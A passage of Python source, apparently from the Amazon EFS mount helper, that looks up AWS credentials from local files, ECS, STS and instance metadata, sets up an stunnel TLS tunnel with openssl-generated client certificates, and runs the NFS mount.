# through IAM role name security credentials lookup uri
iam_role_name = get_iam_role_name()
if iam_role_name:
credentials, credentials_source = get_aws_security_credentials_from_instance_metadata(iam_role_name)
if credentials and credentials_source:
return credentials, credentials_source
error_msg = 'AWS Access Key ID and Secret Access Key are not found in AWS credentials file (%s), config file (%s), ' \
'from ECS credentials relative uri, or from the instance security credentials service' % \
(AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE)
fatal_error(error_msg, error_msg)
def get_aws_security_credentials_from_awsprofile(awsprofile, is_fatal=False):
for file_path in [AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE]:
if os.path.exists(file_path):
credentials = credentials_file_helper(file_path, awsprofile)
if credentials['AccessKeyId']:
return credentials, os.path.basename(file_path) + ':' + awsprofile
# Fail if credentials cannot be fetched from the given awsprofile
if is_fatal:
log_message = 'AWS security credentials not found in %s or %s under named profile [%s]' % \
(AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE, awsprofile)
fatal_error(log_message)
else:
return None, None
def get_aws_security_credentials_from_ecs(aws_creds_uri, is_fatal=False):
ecs_uri = ECS_TASK_METADATA_API + aws_creds_uri
ecs_unsuccessful_resp = 'Unsuccessful retrieval of AWS security credentials at %s.' % ecs_uri
ecs_url_error_msg = 'Unable to reach %s to retrieve AWS security credentials. See %s for more info.' \
% (ecs_uri, SECURITY_CREDS_ECS_URI_HELP_URL)
ecs_security_dict = url_request_helper(ecs_uri, ecs_unsuccessful_resp, ecs_url_error_msg)
if ecs_security_dict and all(k in ecs_security_dict for k in CREDENTIALS_KEYS):
return ecs_security_dict, 'ecs:' + aws_creds_uri
# Fail if credentials cannot be fetched from the given aws_creds_uri
if is_fatal:
fatal_error(ecs_unsuccessful_resp, ecs_unsuccessful_resp)
else:
return None, None
def get_aws_security_credentials_from_webidentity(role_arn, token_file, is_fatal=False):
try:
with open(token_file, 'r') as f:
token = f.read()
except Exception as e:
if is_fatal:
unsuccessful_resp = 'Error reading token file %s: %s' % (token_file, e)
fatal_error(unsuccessful_resp, unsuccessful_resp)
else:
return None, None
webidentity_url = STS_ENDPOINT_URL + '?' + urlencode({
'Version': '2011-06-15',
'Action': 'AssumeRoleWithWebIdentity',
'RoleArn': role_arn,
'RoleSessionName': 'efs-mount-helper',
'WebIdentityToken': token
})
unsuccessful_resp = 'Unsuccessful retrieval of AWS security credentials at %s.' % STS_ENDPOINT_URL
url_error_msg = 'Unable to reach %s to retrieve AWS security credentials. See %s for more info.' % \
(STS_ENDPOINT_URL, SECURITY_CREDS_WEBIDENTITY_HELP_URL)
resp = url_request_helper(webidentity_url, unsuccessful_resp, url_error_msg, headers={'Accept': 'application/json'})
if resp:
creds = resp \
.get('AssumeRoleWithWebIdentityResponse', {}) \
.get('AssumeRoleWithWebIdentityResult', {}) \
.get('Credentials', {})
if all(k in creds for k in ['AccessKeyId', 'SecretAccessKey', 'SessionToken']):
return {
'AccessKeyId': creds['AccessKeyId'],
'SecretAccessKey': creds['SecretAccessKey'],
'Token': creds['SessionToken']
}, 'webidentity:' + ','.join([role_arn, token_file])
# Fail if credentials cannot be fetched from the given aws_creds_uri
if is_fatal:
fatal_error(unsuccessful_resp, unsuccessful_resp)
else:
return None, None
def get_aws_security_credentials_from_instance_metadata(iam_role_name):
security_creds_lookup_url = INSTANCE_IAM_URL + iam_role_name
unsuccessful_resp = 'Unsuccessful retrieval of AWS security credentials at %s.' % security_creds_lookup_url
url_error_msg = 'Unable to reach %s to retrieve AWS security credentials. See %s for more info.' % \
(security_creds_lookup_url, SECURITY_CREDS_IAM_ROLE_HELP_URL)
iam_security_dict = url_request_helper(security_creds_lookup_url, unsuccessful_resp,
url_error_msg, retry_with_new_header_token=True)
if iam_security_dict and all(k in iam_security_dict for k in CREDENTIALS_KEYS):
return iam_security_dict, 'metadata:'
else:
return None, None
def get_iam_role_name():
iam_role_unsuccessful_resp = 'Unsuccessful retrieval of IAM role name at %s.' % INSTANCE_IAM_URL
iam_role_url_error_msg = 'Unable to reach %s to retrieve IAM role name. See %s for more info.' % \
(INSTANCE_IAM_URL, SECURITY_CREDS_IAM_ROLE_HELP_URL)
iam_role_name = url_request_helper(INSTANCE_IAM_URL, iam_role_unsuccessful_resp,
iam_role_url_error_msg, retry_with_new_header_token=True)
return iam_role_name
def credentials_file_helper(file_path, awsprofile):
aws_credentials_configs = read_config(file_path)
credentials = {'AccessKeyId': None, 'SecretAccessKey': None, 'Token': None}
try:
access_key = aws_credentials_configs.get(awsprofile, 'aws_access_key_id')
secret_key = aws_credentials_configs.get(awsprofile, 'aws_secret_access_key')
session_token = aws_credentials_configs.get(awsprofile, 'aws_session_token')
credentials['AccessKeyId'] = access_key
credentials['SecretAccessKey'] = secret_key
credentials['Token'] = session_token
except NoOptionError as e:
if 'aws_access_key_id' in str(e) or 'aws_secret_access_key' in str(e):
logging.debug('aws_access_key_id or aws_secret_access_key not found in %s under named profile [%s]', file_path,
awsprofile)
if 'aws_session_token' in str(e):
logging.debug('aws_session_token not found in %s', file_path)
credentials['AccessKeyId'] = aws_credentials_configs.get(awsprofile, 'aws_access_key_id')
credentials['SecretAccessKey'] = aws_credentials_configs.get(awsprofile, 'aws_secret_access_key')
except NoSectionError:
logging.debug('No [%s] section found in config file %s', awsprofile, file_path)
return credentials
def get_aws_profile(options, use_iam):
awsprofile = options.get('awsprofile')
if not awsprofile and use_iam:
for file_path in [AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE]:
aws_credentials_configs = read_config(file_path)
# check if aws access key id is found under [default] section in current file and return 'default' if so
try:
access_key = aws_credentials_configs.get('default', 'aws_access_key_id')
if access_key is not None:
return 'default'
except (NoSectionError, NoOptionError):
continue
return awsprofile
def url_request_helper(url, unsuccessful_resp, url_error_msg, headers={}, retry_with_new_header_token=False):
try:
req = Request(url)
for k, v in headers.items():
req.add_header(k, v)
request_resp = urlopen(req, timeout=1)
return get_resp_obj(request_resp, url, unsuccessful_resp)
except HTTPError as e:
# For instance enable with IMDSv2, Unauthorized 401 error will be thrown,
# to retrieve metadata, the header should embeded with metadata token
if e.code == 401 and retry_with_new_header_token:
token = get_aws_ec2_metadata_token()
req.add_header('X-aws-ec2-metadata-token', token)
request_resp = urlopen(req, timeout=1)
return get_resp_obj(request_resp, url, unsuccessful_resp)
err_msg = 'Unable to reach the url at %s: status=%d, reason is %s' % (url, e.code, e.reason)
except URLError as e:
err_msg = 'Unable to reach the url at %s, reason is %s' % (url, e.reason)
if err_msg:
logging.debug('%s %s', url_error_msg, err_msg)
return None
def get_resp_obj(request_resp, url, unsuccessful_resp):
if request_resp.getcode() != 200:
logging.debug(unsuccessful_resp + ' %s: ResponseCode=%d', url, request_resp.getcode())
return None
resp_body = request_resp.read()
resp_body_type = type(resp_body)
try:
if resp_body_type is str:
resp_dict = json.loads(resp_body)
else:
resp_dict = json.loads(resp_body.decode(request_resp.headers.get_content_charset() or 'us-ascii'))
return resp_dict
except ValueError as e:
logging.info('ValueError parsing "%s" into json: %s. Returning response body.' % (str(resp_body), e))
return resp_body if resp_body_type is str else resp_body.decode('utf-8')
def parse_options(options):
opts = {}
for o in options.split(','):
if '=' in o:
k, v = o.split('=')
opts[k] = v
else:
opts[o] = None
return opts
def get_tls_port_range(config):
lower_bound = config.getint(CONFIG_SECTION, 'port_range_lower_bound')
upper_bound = config.getint(CONFIG_SECTION, 'port_range_upper_bound')
if lower_bound >= upper_bound:
fatal_error('Configuration option "port_range_upper_bound" defined as %d '
'must be strictly greater than "port_range_lower_bound" defined as %d.'
% (upper_bound, lower_bound))
return lower_bound, upper_bound
def choose_tls_port(config, options):
if 'tlsport' in options:
ports_to_try = [int(options['tlsport'])]
else:
lower_bound, upper_bound = get_tls_port_range(config)
tls_ports = list(range(lower_bound, upper_bound))
# Choose a random midpoint, and then try ports in-order from there
mid = random.randrange(len(tls_ports))
ports_to_try = tls_ports[mid:] + tls_ports[:mid]
assert len(tls_ports) == len(ports_to_try)
sock = socket.socket()
for tls_port in ports_to_try:
try:
sock.bind(('localhost', tls_port))
sock.close()
return tls_port
except socket.error:
continue
sock.close()
if 'tlsport' in options:
fatal_error('Specified port [%s] is unavailable. Try selecting a different port.' % options['tlsport'])
else:
fatal_error('Failed to locate an available port in the range [%d, %d], try specifying a different port range in %s'
% (lower_bound, upper_bound, CONFIG_FILE))
def is_ocsp_enabled(config, options):
if 'ocsp' in options:
return True
elif 'noocsp' in options:
return False
else:
return config.getboolean(CONFIG_SECTION, 'stunnel_check_cert_validity')
def get_mount_specific_filename(fs_id, mountpoint, tls_port):
return '%s.%s.%d' % (fs_id, os.path.abspath(mountpoint).replace(os.sep, '.').lstrip('.'), tls_port)
def serialize_stunnel_config(config, header=None):
lines = []
if header:
lines.append('[%s]' % header)
for k, v in config.items():
if type(v) is list:
for item in v:
lines.append('%s = %s' % (k, item))
else:
lines.append('%s = %s' % (k, v))
return lines
def add_stunnel_ca_options(efs_config, config, options):
if 'cafile' in options:
stunnel_cafile = options['cafile']
else:
try:
stunnel_cafile = config.get(CONFIG_SECTION, 'stunnel_cafile')
except NoOptionError:
logging.debug('No CA file configured, using default CA file %s', DEFAULT_STUNNEL_CAFILE)
stunnel_cafile = DEFAULT_STUNNEL_CAFILE
if not os.path.exists(stunnel_cafile):
fatal_error('Failed to find certificate authority file for verification',
'Failed to find CAfile "%s"' % stunnel_cafile)
efs_config['CAfile'] = stunnel_cafile
def is_stunnel_option_supported(stunnel_output, stunnel_option_name):
supported = False
for line in stunnel_output:
if line.startswith(stunnel_option_name):
supported = True
break
if not supported:
logging.warning('stunnel does not support "%s"', stunnel_option_name)
return supported
def get_version_specific_stunnel_options():
stunnel_command = [_stunnel_bin(), '-help']
proc = subprocess.Popen(stunnel_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
proc.wait()
_, err = proc.communicate()
stunnel_output = err.splitlines()
check_host_supported = is_stunnel_option_supported(stunnel_output, b'checkHost')
ocsp_aia_supported = is_stunnel_option_supported(stunnel_output, b'OCSPaia')
return check_host_supported, ocsp_aia_supported
def _stunnel_bin():
return find_command_path('stunnel',
'Please install it following the instructions at '
'https://docs.aws.amazon.com/efs/latest/ug/using-amazon-efs-utils.html#upgrading-stunnel')
def find_command_path(command, install_method):
try:
env_path = '/sbin:/usr/sbin:/usr/local/sbin:/root/bin:/usr/local/bin:/usr/bin:/bin'
os.putenv('PATH', env_path)
path = subprocess.check_output(['which', command])
except subprocess.CalledProcessError as e:
fatal_error('Failed to locate %s in %s - %s' % (command, env_path, install_method), e)
return path.strip().decode()
def get_system_release_version():
try:
with open(SYSTEM_RELEASE_PATH) as f:
return f.read().strip()
except IOError:
logging.debug('Unable to read %s', SYSTEM_RELEASE_PATH)
try:
with open(OS_RELEASE_PATH) as f:
for line in f:
if 'PRETTY_NAME' in line:
return line.split('=')[1].strip()
except IOError:
logging.debug('Unable to read %s', OS_RELEASE_PATH)
return 'unknown'
def write_stunnel_config_file(config, state_file_dir, fs_id, mountpoint, tls_port, dns_name, verify_level, ocsp_enabled,
options, log_dir=LOG_DIR, cert_details=None):
"""
Serializes stunnel configuration to a file. Unfortunately this does not conform to Python's config file format, so we have to
hand-serialize it.
"""
mount_filename = get_mount_specific_filename(fs_id, mountpoint, tls_port)
global_config = dict(STUNNEL_GLOBAL_CONFIG)
if config.getboolean(CONFIG_SECTION, 'stunnel_debug_enabled'):
global_config['debug'] = 'debug'
if config.has_option(CONFIG_SECTION, 'stunnel_logs_file'):
global_config['output'] = config.get(CONFIG_SECTION, 'stunnel_logs_file').replace('{fs_id}', fs_id)
else:
global_config['output'] = os.path.join(log_dir, '%s.stunnel.log' % mount_filename)
efs_config = dict(STUNNEL_EFS_CONFIG)
efs_config['accept'] = efs_config['accept'] % tls_port
efs_config['connect'] = efs_config['connect'] % dns_name
efs_config['verify'] = verify_level
if verify_level > 0:
add_stunnel_ca_options(efs_config, config, options)
if cert_details:
efs_config['cert'] = cert_details['certificate']
efs_config['key'] = cert_details['privateKey']
check_host_supported, ocsp_aia_supported = get_version_specific_stunnel_options()
tls_controls_message = 'WARNING: Your client lacks sufficient controls to properly enforce TLS. Please upgrade stunnel, ' \
'or disable "%%s" in %s.\nSee %s for more detail.' % (CONFIG_FILE,
'https://docs.aws.amazon.com/console/efs/troubleshooting-tls')
if config.getboolean(CONFIG_SECTION, 'stunnel_check_cert_hostname'):
if check_host_supported:
efs_config['checkHost'] = dns_name
else:
fatal_error(tls_controls_message % 'stunnel_check_cert_hostname')
# Only use the config setting if the override is not set
if ocsp_enabled:
if ocsp_aia_supported:
efs_config['OCSPaia'] = 'yes'
else:
fatal_error(tls_controls_message % 'stunnel_check_cert_validity')
system_release_version = get_system_release_version()
if not any(release in system_release_version for release in SKIP_NO_LIBWRAP_RELEASES):
efs_config['libwrap'] = 'no'
stunnel_config = '\n'.join(serialize_stunnel_config(global_config) + serialize_stunnel_config(efs_config, 'efs'))
logging.debug('Writing stunnel configuration:\n%s', stunnel_config)
stunnel_config_file = os.path.join(state_file_dir, 'stunnel-config.%s' % mount_filename)
with open(stunnel_config_file, 'w') as f:
f.write(stunnel_config)
return stunnel_config_file
def write_tls_tunnel_state_file(fs_id, mountpoint, tls_port, tunnel_pid, command, files, state_file_dir, cert_details=None):
"""
Return the name of the temporary file containing TLS tunnel state, prefixed with a '~'. This file needs to be renamed to a
non-temporary version following a successful mount.
"""
state_file = '~' + get_mount_specific_filename(fs_id, mountpoint, tls_port)
state = {
'pid': tunnel_pid,
'cmd': command,
'files': files,
}
if cert_details:
state.update(cert_details)
with open(os.path.join(state_file_dir, state_file), 'w') as f:
json.dump(state, f)
return state_file
def test_tunnel_process(tunnel_proc, fs_id):
tunnel_proc.poll()
if tunnel_proc.returncode is not None:
out, err = tunnel_proc.communicate()
fatal_error('Failed to initialize TLS tunnel for %s' % fs_id,
'Failed to start TLS tunnel (errno=%d). stdout="%s" stderr="%s"'
% (tunnel_proc.returncode, out.strip(), err.strip()))
def poll_tunnel_process(tunnel_proc, fs_id, mount_completed):
"""
poll the tunnel process health every .5s during the mount attempt to fail fast if the tunnel dies - since this is not called
from the main thread, if the tunnel fails, exit uncleanly with os._exit
"""
while not mount_completed.is_set():
try:
test_tunnel_process(tunnel_proc, fs_id)
except SystemExit as e:
os._exit(e.code)
mount_completed.wait(.5)
def get_init_system(comm_file='/proc/1/comm'):
init_system = 'unknown'
try:
with open(comm_file) as f:
init_system = f.read().strip()
except IOError:
logging.warning('Unable to read %s', comm_file)
logging.debug('Identified init system: %s', init_system)
return init_system
def check_network_target(fs_id):
with open(os.devnull, 'w') as devnull:
rc = subprocess.call(['systemctl', 'status', 'network.target'], stdout=devnull, stderr=devnull, close_fds=True)
if rc != 0:
fatal_error('Failed to mount %s because the network was not yet available, add "_netdev" to your mount options' % fs_id,
exit_code=0)
def check_network_status(fs_id, init_system):
if init_system != 'systemd':
logging.debug('Not testing network on non-systemd init systems')
return
check_network_target(fs_id)
def start_watchdog(init_system):
if init_system == 'init':
proc = subprocess.Popen(
['/sbin/status', WATCHDOG_SERVICE], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
status, _ = proc.communicate()
if 'stop' in status:
with open(os.devnull, 'w') as devnull:
subprocess.Popen(['/sbin/start', WATCHDOG_SERVICE], stdout=devnull, stderr=devnull, close_fds=True)
elif 'start' in status:
logging.debug('%s is already running', WATCHDOG_SERVICE)
elif init_system == 'systemd':
rc = subprocess.call(['systemctl', 'is-active', '--quiet', WATCHDOG_SERVICE], close_fds=True)
if rc != 0:
with open(os.devnull, 'w') as devnull:
subprocess.Popen(['systemctl', 'start', WATCHDOG_SERVICE], stdout=devnull, stderr=devnull, close_fds=True)
else:
logging.debug('%s is already running', WATCHDOG_SERVICE)
else:
error_message = 'Could not start %s, unrecognized init system "%s"' % (WATCHDOG_SERVICE, init_system)
sys.stderr.write('%s\n' % error_message)
logging.warning(error_message)
def create_required_directory(config, directory):
mode = 0o750
try:
mode_str = config.get(CONFIG_SECTION, 'state_file_dir_mode')
try:
mode = int(mode_str, 8)
except ValueError:
logging.warning('Bad state_file_dir_mode "%s" in config file "%s"', mode_str, CONFIG_FILE)
except NoOptionError:
pass
try:
os.makedirs(directory, mode)
except OSError as e:
if errno.EEXIST != e.errno or not os.path.isdir(directory):
raise
@contextmanager
def bootstrap_tls(config, init_system, dns_name, fs_id, mountpoint, options, state_file_dir=STATE_FILE_DIR):
tls_port = choose_tls_port(config, options)
# override the tlsport option so that we can later override the port the NFS client uses to connect to stunnel.
# if the user has specified tlsport=X at the command line this will just re-set tlsport to X.
options['tlsport'] = tls_port
use_iam = 'iam' in options
ap_id = options.get('accesspoint')
cert_details = {}
security_credentials = None
client_info = get_client_info(config)
if use_iam:
aws_creds_uri = options.get('awscredsuri')
if aws_creds_uri:
kwargs = {'aws_creds_uri': aws_creds_uri}
else:
kwargs = {'awsprofile': get_aws_profile(options, use_iam)}
security_credentials, credentials_source = get_aws_security_credentials(use_iam, **kwargs)
if credentials_source:
cert_details['awsCredentialsMethod'] = credentials_source
if ap_id:
cert_details['accessPoint'] = ap_id
# additional symbol appended to avoid naming collisions
cert_details['mountStateDir'] = get_mount_specific_filename(fs_id, mountpoint, tls_port) + '+'
# common name for certificate signing request is max 64 characters
cert_details['commonName'] = socket.gethostname()[0:64]
cert_details['region'] = get_target_region(config)
cert_details['certificateCreationTime'] = create_certificate(config, cert_details['mountStateDir'],
cert_details['commonName'], cert_details['region'], fs_id,
security_credentials, ap_id, client_info,
base_path=state_file_dir)
cert_details['certificate'] = os.path.join(state_file_dir, cert_details['mountStateDir'], 'certificate.pem')
cert_details['privateKey'] = get_private_key_path()
cert_details['fsId'] = fs_id
start_watchdog(init_system)
if not os.path.exists(state_file_dir):
create_required_directory(config, state_file_dir)
verify_level = int(options.get('verify', DEFAULT_STUNNEL_VERIFY_LEVEL))
ocsp_enabled = is_ocsp_enabled(config, options)
stunnel_config_file = write_stunnel_config_file(config, state_file_dir, fs_id, mountpoint, tls_port, dns_name, verify_level,
ocsp_enabled, options, cert_details=cert_details)
tunnel_args = [_stunnel_bin(), stunnel_config_file]
if 'netns' in options:
tunnel_args = ['nsenter', '--net=' + options['netns']] + tunnel_args
# launch the tunnel in a process group so if it has any child processes, they can be killed easily by the mount watchdog
logging.info('Starting TLS tunnel: "%s"', ' '.join(tunnel_args))
tunnel_proc = subprocess.Popen(
tunnel_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setsid, close_fds=True)
logging.info('Started TLS tunnel, pid: %d', tunnel_proc.pid)
temp_tls_state_file = write_tls_tunnel_state_file(fs_id, mountpoint, tls_port, tunnel_proc.pid, tunnel_args,
[stunnel_config_file], state_file_dir, cert_details=cert_details)
try:
yield tunnel_proc
finally:
os.rename(os.path.join(state_file_dir, temp_tls_state_file), os.path.join(state_file_dir, temp_tls_state_file[1:]))
def get_nfs_mount_options(options):
# If you change these options, update the man page as well at man/mount.efs.8
if 'nfsvers' not in options and 'vers' not in options:
options['nfsvers'] = '4.1'
if 'rsize' not in options:
options['rsize'] = '1048576'
if 'wsize' not in options:
options['wsize'] = '1048576'
if 'soft' not in options and 'hard' not in options:
options['hard'] = None
if 'timeo' not in options:
options['timeo'] = '600'
if 'retrans' not in options:
options['retrans'] = '2'
if 'noresvport' not in options:
options['noresvport'] = None
if 'tls' in options:
options['port'] = options['tlsport']
def to_nfs_option(k, v):
if v is None:
return k
return '%s=%s' % (str(k), str(v))
nfs_options = [to_nfs_option(k, v) for k, v in options.items() if k not in EFS_ONLY_OPTIONS]
return ','.join(nfs_options)
def mount_nfs(dns_name, path, mountpoint, options):
if 'tls' in options:
mount_path = '127.0.0.1:%s' % path
else:
mount_path = '%s:%s' % (dns_name, path)
command = ['/sbin/mount.nfs4', mount_path, mountpoint, '-o', get_nfs_mount_options(options)]
if 'netns' in options:
command = ['nsenter', '--net=' + options['netns']] + command
logging.info('Executing: "%s"', ' '.join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
out, err = proc.communicate()
if proc.returncode == 0:
message = 'Successfully mounted %s at %s' % (dns_name, mountpoint)
logging.info(message)
publish_cloudwatch_log(CLOUDWATCHLOG_AGENT, message)
else:
message = 'Failed to mount %s at %s: returncode=%d, stderr="%s"' % (dns_name, mountpoint, proc.returncode, err.strip())
fatal_error(err.strip(), message, proc.returncode)
def usage(out, exit_code=1):
out.write('Usage: mount.efs [--version] [-h|--help] <fsname> <mountpoint> [-o <options>]\n')
sys.exit(exit_code)
def parse_arguments_early_exit(args=None):
"""Parse arguments, checking for early exit conditions only"""
if args is None:
args = sys.argv
if '-h' in args[1:] or '--help' in args[1:]:
usage(out=sys.stdout, exit_code=0)
if '--version' in args[1:]:
sys.stdout.write('%s Version: %s\n' % (args[0], VERSION))
sys.exit(0)
def parse_arguments(config, args=None):
"""Parse arguments, return (fsid, path, mountpoint, options)"""
if args is None:
args = sys.argv
fsname = None
mountpoint = None
options = {}
if len(args) > 1:
fsname = args[1]
if len(args) > 2:
mountpoint = args[2]
if len(args) > 4 and '-o' in args[:-1]:
options_index = args.index('-o') + 1
options = parse_options(args[options_index])
if not fsname or not mountpoint:
usage(out=sys.stderr)
fs_id, path = match_device(config, fsname)
return fs_id, path, mountpoint, options
def get_client_info(config):
client_info = {}
# source key/value pair in config file
if config.has_option(CLIENT_INFO_SECTION, 'source'):
client_source = config.get(CLIENT_INFO_SECTION, 'source')
if 0 < len(client_source) <= CLIENT_SOURCE_STR_LEN_LIMIT:
client_info['source'] = client_source
return client_info
def create_certificate(config, mount_name, common_name, region, fs_id, security_credentials, ap_id, client_info,
base_path=STATE_FILE_DIR):
current_time = get_utc_now()
tls_paths = tls_paths_dictionary(mount_name, base_path)
certificate_config = os.path.join(tls_paths['mount_dir'], 'config.conf')
certificate_signing_request = os.path.join(tls_paths['mount_dir'], 'request.csr')
certificate = os.path.join(tls_paths['mount_dir'], 'certificate.pem')
ca_dirs_check(config, tls_paths['database_dir'], tls_paths['certs_dir'])
ca_supporting_files_check(tls_paths['index'], tls_paths['index_attr'], tls_paths['serial'], tls_paths['rand'])
private_key = check_and_create_private_key(base_path)
if security_credentials:
public_key = os.path.join(tls_paths['mount_dir'], 'publicKey.pem')
create_public_key(private_key, public_key)
create_ca_conf(certificate_config, common_name, tls_paths['mount_dir'], private_key, current_time, region, fs_id,
security_credentials, ap_id, client_info)
create_certificate_signing_request(certificate_config, private_key, certificate_signing_request)
not_before = get_certificate_timestamp(current_time, minutes=-NOT_BEFORE_MINS)
not_after = get_certificate_timestamp(current_time, hours=NOT_AFTER_HOURS)
cmd = 'openssl ca -startdate %s -enddate %s -selfsign -batch -notext -config %s -in %s -out %s' % \
(not_before, not_after, certificate_config, certificate_signing_request, certificate)
subprocess_call(cmd, 'Failed to create self-signed client-side certificate')
return current_time.strftime(CERT_DATETIME_FORMAT)
def get_private_key_path():
"""Wrapped for mocking purposes in unit tests"""
return PRIVATE_KEY_FILE
def check_and_create_private_key(base_path=STATE_FILE_DIR):
# Creating RSA private keys is slow, so we will create one private key and allow mounts to share it.
# This means, however, that we have to include a locking mechanism to ensure that the private key is
# atomically created, as mounts occurring in parallel may try to create the key simultaneously.
key = get_private_key_path()
@contextmanager
def open_lock_file():
lock_file = os.path.join(base_path, 'efs-utils-lock')
f = os.open(lock_file, os.O_CREAT | os.O_DSYNC | os.O_EXCL | os.O_RDWR)
try:
lock_file_contents = 'PID: %s' % os.getpid()
os.write(f, lock_file_contents.encode('utf-8'))
yield f
finally:
os.close(f)
os.remove(lock_file)
def do_with_lock(function):
while True:
try:
with open_lock_file():
return function()
except OSError as e:
if e.errno == errno.EEXIST:
logging.info('Failed to take out private key creation lock, sleeping 50 ms')
time.sleep(0.05)
else:
raise
def generate_key():
if os.path.isfile(key):
return
cmd = 'openssl genpkey -algorithm RSA -out %s -pkeyopt rsa_keygen_bits:3072' % key
subprocess_call(cmd, 'Failed to create private key')
read_only_mode = 0o400
os.chmod(key, read_only_mode)
do_with_lock(generate_key)
return key
def create_certificate_signing_request(config_path, private_key, csr_path):
cmd = 'openssl req -new -config %s -key %s -out %s' % (config_path, private_key, csr_path)
subprocess_call(cmd, 'Failed to create certificate signing request (csr)')
def create_ca_conf(config_path, common_name, directory, private_key, date,
region, fs_id, security_credentials, ap_id, client_info):
"""Populate ca/req configuration file with fresh configurations at every mount since SigV4 signature can change"""
public_key_path = os.path.join(directory, 'publicKey.pem')
ca_extension_body = ca_extension_builder(ap_id, security_credentials, fs_id, client_info)
efs_client_auth_body = efs_client_auth_builder(public_key_path, security_credentials['AccessKeyId'],
security_credentials['SecretAccessKey'], date, region, fs_id,
security_credentials['Token']) if security_credentials else ''
efs_client_info_body = efs_client_info_builder(client_info) if client_info else ''
full_config_body = CA_CONFIG_BODY % (directory, private_key, common_name, ca_extension_body,
efs_client_auth_body, efs_client_info_body)
with open(config_path, 'w') as f:
f.write(full_config_body)
return full_config_body
def ca_extension_builder(ap_id, security_credentials, fs_id, client_info):
ca_extension_str = '[ v3_ca ]\nsubjectKeyIdentifier = hash'
if ap_id:
ca_extension_str += '\n1.3.6.1.4.1.4843.7.1 = ASN1:UTF8String:' + ap_id
if security_credentials:
ca_extension_str += '\n1.3.6.1.4.1.4843.7.2 = ASN1:SEQUENCE:efs_client_auth'
ca_extension_str += '\n1.3.6.1.4.1.4843.7.3 = ASN1:UTF8String:' + fs_id
if client_info:
ca_extension_str += '\n1.3.6.1.4.1.4843.7.4 = ASN1:SEQUENCE:efs_client_info'
return ca_extension_str
def efs_client_auth_builder(public_key_path, access_key_id, secret_access_key, date, region, fs_id, session_token=None):
public_key_hash = get_public_key_sha1(public_key_path)
canonical_request = create_canonical_request(public_key_hash, date, access_key_id, region, fs_id, session_token)
string_to_sign = create_string_to_sign(canonical_request, date, region)
signature = calculate_signature(string_to_sign, date, secret_access_key, region)
efs_client_auth_str = '[ efs_client_auth ]'
efs_client_auth_str += '\naccessKeyId = UTF8String:' + access_key_id
efs_client_auth_str += '\nsignature = OCTETSTRING:' + signature
efs_client_auth_str += '\nsigv4DateTime = UTCTIME:' + date.strftime(CERT_DATETIME_FORMAT)
if session_token:
efs_client_auth_str += '\nsessionToken = EXPLICIT:0,UTF8String:' + session_token
return efs_client_auth_str
def efs_client_info_builder(client_info):
efs_client_info_str = '[ efs_client_info ]'
for key, value in client_info.items():
efs_client_info_str += '\n%s = UTF8String:%s' % (key, value)
return efs_client_info_str
def create_public_key(private_key, public_key):
cmd = 'openssl rsa -in %s -outform PEM -pubout -out %s' % (private_key, public_key)
subprocess_call(cmd, 'Failed to create public key')
def subprocess_call(cmd, error_message):
"""Helper method to run shell openssl command and to handle response error messages"""
retry_times = 3
for retry in range(retry_times):
process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
(output, err) = process.communicate()
rc = process.poll()
if rc != 0:
logging.error('Command %s failed, rc=%s, stdout="%s", stderr="%s"' % (cmd, rc, output, err), exc_info=True)
try:
process.kill()
except OSError:
# Silently fail if the subprocess has exited already
pass
else:
return output, err
error_message = '%s, error is: %s' % (error_message, err)
fatal_error(error_message, error_message)
def ca_dirs_check(config, database_dir, certs_dir):
"""Check if mount's database and certs directories exist and if not, create directories (also create all intermediate
directories if they don't exist)."""
if not os.path.exists(database_dir):
create_required_directory(config, database_dir)
if not os.path.exists(certs_dir):
create_required_directory(config, certs_dir)
def ca_supporting_files_check(index_path, index_attr_path, serial_path, rand_path):
"""Recreate all supporting openssl ca and req files if they're not present in their respective directories"""
if not os.path.isfile(index_path):
open(index_path, 'w').close()
if not os.path.isfile(index_attr_path):
with open(index_attr_path, 'w+') as f:
f.write('unique_subject = no')
if not os.path.isfile(serial_path):
with open(serial_path, 'w+') as f:
f.write('00')
if not os.path.isfile(rand_path):
open(rand_path, 'w').close()
def get_certificate_timestamp(current_time, **kwargs):
updated_time = current_time + timedelta(**kwargs)
return updated_time.strftime(CERT_DATETIME_FORMAT)
def get_utc_now():
"""
Wrapped for patching purposes in unit tests
"""
return datetime.utcnow()
def assert_root():
if os.geteuid() != 0:
sys.stderr.write('only root can run mount.efs\n')
sys.exit(1)
def read_config(config_file=CONFIG_FILE):
try:
p = ConfigParser.SafeConfigParser()
except AttributeError:
p = ConfigParser()
p.read(config_file)
return p
def bootstrap_logging(config, log_dir=LOG_DIR):
raw_level = config.get(CONFIG_SECTION, 'logging_level')
levels = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}
level = levels.get(raw_level.lower())
level_error = False
if not level:
# delay logging error about malformed log level until after logging is configured
level_error = True
level = logging.INFO
max_bytes = config.getint(CONFIG_SECTION, 'logging_max_bytes')
file_count = config.getint(CONFIG_SECTION, 'logging_file_count')
handler = RotatingFileHandler(os.path.join(log_dir, LOG_FILE), maxBytes=max_bytes, backupCount=file_count)
handler.setFormatter(logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(message)s'))
logger = logging.getLogger()
logger.setLevel(level)
logger.addHandler(handler)
if level_error:
logging.error('Malformed logging level "%s", setting logging level to %s', raw_level, level)
def get_dns_name(config, fs_id):
def _validate_replacement_field_count(format_str, expected_ct):
if format_str.count('{') != expected_ct or format_str.count('}') != expected_ct:
raise ValueError('DNS name format has an incorrect number of replacement fields')
dns_name_format = config.get(CONFIG_SECTION, 'dns_name_format')
if '{fs_id}' not in dns_name_format:
raise ValueError('DNS name format must include {fs_id}')
format_args = {'fs_id': fs_id}
expected_replacement_field_ct = 1
if '{region}' in dns_name_format:
expected_replacement_field_ct += 1
format_args['region'] = get_target_region(config)
if '{dns_name_suffix}' in dns_name_format:
